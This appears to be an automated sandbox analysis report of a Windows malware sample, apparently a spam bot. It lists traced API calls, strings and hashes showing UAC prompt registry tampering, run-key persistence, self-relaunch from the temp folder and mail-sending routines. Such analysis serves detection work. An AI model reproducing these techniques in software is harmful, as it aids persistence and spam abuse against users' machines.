                                                                                        • Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
                                                                                        • Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                        • Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00403103
                                                                                        • GetTickCount.KERNEL32 ref: 0040310F
                                                                                        • Sleep.KERNEL32(00000000), ref: 0040311C
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                        • Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
                                                                                        • Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                        • Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00000001,026144E2,00000000,00000000,00000000), ref: 0261E470
                                                                                        • CloseHandle.KERNEL32(00000001,00000003), ref: 0261E484
                                                                                          • Part of subcall function 0261E2FC: RegCreateKeyExA.ADVAPI32(80000001,0261E50A,00000000,00000000,00000000,00020106,00000000,0261E50A,00000000,000000E4), ref: 0261E319
                                                                                          • Part of subcall function 0261E2FC: RegSetValueExA.ADVAPI32(0261E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0261E38E
                                                                                          • Part of subcall function 0261E2FC: RegDeleteValueA.ADVAPI32(0261E50A,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0261E3BF
                                                                                          • Part of subcall function 0261E2FC: RegCloseKey.ADVAPI32(0261E50A,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0261E50A), ref: 0261E3C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 4151426672-2980165447
                                                                                        • Opcode ID: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                        • Instruction ID: cc01ddd89dbac505d81566559ad1ed97ed1b442f64e2b45f009cdc262f0a9e28
                                                                                        • Opcode Fuzzy Hash: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                        • Instruction Fuzzy Hash: E541B871D00214BAEB206F918C46FEB3B6DEF04764F1C8029FD0994191E7B6E650DBB5
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00000001,0040DAE0,00000000,00000000,00000000), ref: 0040E209
                                                                                        • CloseHandle.KERNEL32(00000001,00000003), ref: 0040E21D
                                                                                          • Part of subcall function 0040E095: RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                          • Part of subcall function 0040E095: RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
                                                                                          • Part of subcall function 0040E095: RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
                                                                                          • Part of subcall function 0040E095: RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 4151426672-2980165447
                                                                                        • Opcode ID: b35f9f727470473fe34b0fcdae204b38b052469ea0fd64ba9bdd2db24e4b8a6b
                                                                                        • Instruction ID: b34283ca0245a4d5345772c7626065eb71a791ff6ac24fd5689ebe733b27dfc9
                                                                                        • Opcode Fuzzy Hash: b35f9f727470473fe34b0fcdae204b38b052469ea0fd64ba9bdd2db24e4b8a6b
                                                                                        • Instruction Fuzzy Hash: 5D41DB71940214BADB205E938C06FDB3F6CEB44754F1084BEFA09B41D2E6B99A60D6BD
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 026183C6
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 02618477
                                                                                          • Part of subcall function 026169C3: SetFileAttributesA.KERNEL32(?,00000080), ref: 026169E5
                                                                                          • Part of subcall function 026169C3: SetFileAttributesA.KERNEL32(?,00000002), ref: 02616A26
                                                                                          • Part of subcall function 026169C3: GetFileSize.KERNEL32(000000FF,00000000), ref: 02616A3A
                                                                                          • Part of subcall function 0261EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,02611DCF,?), ref: 0261EEA8
                                                                                          • Part of subcall function 0261EE95: HeapFree.KERNEL32(00000000), ref: 0261EEAF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesHeap$CloseFreeOpenProcessSize
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 359188348-2980165447
                                                                                        • Opcode ID: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                        • Instruction ID: d0312ea22b43ca6d0f64d5cf53bbab9cfb60ec253943d7da28b916942b031b46
                                                                                        • Opcode Fuzzy Hash: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                        • Instruction Fuzzy Hash: DC4175B2900159BFEB10EBA09D81EFF777DEB04344F18446AE904D7110FBB16A548B54
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,0261E859,00000000,00020119,0261E859,PromptOnSecureDesktop), ref: 0261E64D
                                                                                        • RegCloseKey.ADVAPI32(0261E859,?,?,?,?,000000C8,000000E4), ref: 0261E787
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 47109696-2980165447
                                                                                        • Opcode ID: ca61599b3ee270ad7d52ab6b22e6fbb0cb95010ae32332e4c3022532ab02544e
                                                                                        • Instruction ID: 7e81e42245d51cef4866fa7618778d776e3cfc2501d5b8abe9aaf741bb84da1a
                                                                                        • Opcode Fuzzy Hash: ca61599b3ee270ad7d52ab6b22e6fbb0cb95010ae32332e4c3022532ab02544e
                                                                                        • Instruction Fuzzy Hash: 2D41EAB2D0021DBFDF11DF94DC85DEEBB79FF04304F18446AEA10A6160E372AA559B64
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 0261AFFF
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0261B00D
                                                                                          • Part of subcall function 0261AF6F: gethostname.WS2_32(?,00000080), ref: 0261AF83
                                                                                          • Part of subcall function 0261AF6F: lstrcpy.KERNEL32(?,00410B90), ref: 0261AFE6
                                                                                          • Part of subcall function 0261331C: gethostname.WS2_32(?,00000080), ref: 0261333F
                                                                                          • Part of subcall function 0261331C: gethostbyname.WS2_32(?), ref: 02613349
                                                                                          • Part of subcall function 0261AA0A: inet_ntoa.WS2_32(00000000), ref: 0261AA10
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                        • String ID: %OUTLOOK_BND_
                                                                                        • API String ID: 1981676241-3684217054
                                                                                        • Opcode ID: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                        • Instruction ID: 2c55fce878c3543941cf21b0e74a3b32e18ea838921b649f483db7f156ac32d7
                                                                                        • Opcode Fuzzy Hash: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                        • Instruction Fuzzy Hash: 47412F7290034CABDB25EFA0DC45EEE3BADFF08304F18442AF92992151EA75E654CF58
                                                                                        APIs
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 02619536
                                                                                        • Sleep.KERNEL32(000001F4), ref: 0261955D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShellSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4194306370-3916222277
                                                                                        • Opcode ID: 441ad30f2646d1b8623b46c1d7e45f404d08a6258c9d37c2b51fbe89c32dcb37
                                                                                        • Instruction ID: e46d03455dce8af61e0cada6633579497bc06da0700ee18db5c627b7ca840db0
                                                                                        • Opcode Fuzzy Hash: 441ad30f2646d1b8623b46c1d7e45f404d08a6258c9d37c2b51fbe89c32dcb37
                                                                                        • Instruction Fuzzy Hash: C44116718093846FFB368B68D8AD7B63FE49B02318F1C41A5D482A72A2D7B46981C711
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0261B9D9
                                                                                        • InterlockedIncrement.KERNEL32(00413648), ref: 0261BA3A
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 0261BA94
                                                                                        • GetTickCount.KERNEL32 ref: 0261BB79
                                                                                        • GetTickCount.KERNEL32 ref: 0261BB99
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 0261BE15
                                                                                        • closesocket.WS2_32(00000000), ref: 0261BEB4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountIncrementInterlockedTick$closesocket
                                                                                        • String ID: %FROM_EMAIL
                                                                                        • API String ID: 1869671989-2903620461
                                                                                        • Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                        • Instruction ID: a0d8aafca14de9d2815d699dc372a146b6513ebc39b0f0ad8a632fce1ab55050
                                                                                        • Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                        • Instruction Fuzzy Hash: 0031B171900248DFDF25DFA4DC84BEDB7B9EB48704F28405AFA24821A0DB71EA85CF54
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 536389180-1857712256
                                                                                        • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                        • Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
                                                                                        • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                        • Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C
                                                                                        APIs
                                                                                        Strings
                                                                                        • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTickwsprintf
                                                                                        • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
                                                                                        • API String ID: 2424974917-1012700906
                                                                                        • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                        • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                        • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                        • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                        APIs
                                                                                          • Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
                                                                                          • Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00403929
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00403939
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                        • String ID: %FROM_EMAIL
                                                                                        • API String ID: 3716169038-2903620461
                                                                                        • Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                        • Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
                                                                                        • Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                        • Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 026170BC
                                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 026170F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$AccountLookupUser
                                                                                        • String ID: |
                                                                                        • API String ID: 2370142434-2343686810
                                                                                        • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                        • Instruction ID: c934aac9c002d020108046fbac3637c024ecac5409e9adfc9b79e1ae78a6dee6
                                                                                        • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                        • Instruction Fuzzy Hash: 43111E7290411CEBDF12CFE4DC85ADEF7BDAB09715F2841A6E501E6194D770AB88CBA0
                                                                                        APIs
                                                                                          • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                          • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                        • GetComputerNameA.KERNEL32(?,0000000F), ref: 00401BA3
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 2777991786-1857712256
                                                                                        • Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                        • Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
                                                                                        • Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                        • Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1
                                                                                        APIs
                                                                                        • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
                                                                                        • InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: IncrementInterlockedlstrcpyn
                                                                                        • String ID: %FROM_EMAIL
                                                                                        • API String ID: 224340156-2903620461
                                                                                        • Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                        • Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
                                                                                        • Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                        • Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96
                                                                                        APIs
                                                                                        • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
                                                                                        • inet_ntoa.WS2_32(?), ref: 004026E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbyaddrinet_ntoa
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 2112563974-1857712256
                                                                                        • Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                        • Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
                                                                                        • Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                        • Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbynameinet_addr
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 1594361348-2401304539
                                                                                        • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
                                                                                        • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,7508EA50,80000001,00000000), ref: 0040EAF2
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 0040EB07
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: ntdll.dll
                                                                                        • API String ID: 2574300362-2227199552
                                                                                        • Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                        • Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
                                                                                        • Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                        • Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C
                                                                                        APIs
                                                                                          • Part of subcall function 02612F88: GetModuleHandleA.KERNEL32(?), ref: 02612FA1
                                                                                          • Part of subcall function 02612F88: LoadLibraryA.KERNEL32(?), ref: 02612FB1
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026131DA
                                                                                        • HeapFree.KERNEL32(00000000), ref: 026131E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1017166417-0
                                                                                        • Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                        • Instruction ID: 748d1f5a32de7caa2923327edfa77ad575e5d8efb0e77a5819cdfd431022425a
                                                                                        • Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                        • Instruction Fuzzy Hash: E5519D7190028AAFCB059F64D884AEAB775FF05305F1841A9EC96C7310E732EA69CB94
                                                                                        APIs
                                                                                          • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,759223A0,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                          • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00402F7A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1017166417-0
                                                                                        • Opcode ID: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                        • Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
                                                                                        • Opcode Fuzzy Hash: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                        • Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
                                                                                        • SetErrorMode.KERNELBASE(00000003), ref: 00409A83
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00406511), ref: 00409A8A
                                                                                          • Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                          • Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                          • Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
                                                                                        • GetCommandLineA.KERNEL32 ref: 00409AFD
                                                                                        • lstrlenA.KERNEL32(?), ref: 00409B99
                                                                                        • ExitProcess.KERNEL32 ref: 00409C06
                                                                                        • GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00409D8B
                                                                                        • lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
                                                                                        • DeleteFileA.KERNEL32(00000022), ref: 00409E38
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
                                                                                        • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
                                                                                        • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
                                                                                        • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
                                                                                        • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
                                                                                        • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
                                                                                        • lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
                                                                                        • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
                                                                                        • wsprintfA.USER32 ref: 0040A0B6
                                                                                        • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
                                                                                        • lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
                                                                                        • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
                                                                                        • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
                                                                                        • GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
                                                                                        • GetCommandLineA.KERNEL32 ref: 0040A1E5
                                                                                          • Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,004122F8,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                          • Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                          • Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                        • lstrlenA.KERNEL32(?), ref: 0040A288
